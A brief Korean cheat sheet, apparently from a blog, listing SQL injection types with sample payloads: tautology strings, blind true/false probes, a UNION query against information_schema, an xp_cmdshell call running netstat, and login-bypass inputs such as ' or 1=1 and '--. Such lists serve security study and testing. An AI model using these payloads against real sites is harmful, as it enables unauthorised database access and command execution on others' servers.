1. SQL Injection – 논리적 에러

ex) SELECT * FROM user_data WHERE last_name = ‘Your Name’ or ‘1=1’

 

2. Blind SQL Injection – 쿼리 결과 여부

ex1) http://www.xxx.com/page.php?id=5 and 1=1

ex2) http://www.xxx.com/page.php?id=5 and 1=2

 

3. Union SQL Injection – 이중 쿼리

ex1) http://www.site.com/news.php?id=5

union all select top 1 table_name from information_schema.tables

 

4. Stored Procedure SQL Injection – 저장 프로시저

ex1) http://www.site.com/member/chekid.asp?id=

‘;CREATE…..r.dbo.xp_cmdshell%20’netstat%20-an’;12

 

 

공격 방법

 

1) 계정 ‘– 암호 —

에러정보

Uname=%27–%Pass=%27–&submitLogin=Submit

 

2) 계정 ‘or 1=1 암호 ‘or 1=1

에러정보

‘UserName = ”or 1=1’ and Pass = ”or 1=1”

 

댓글 남기기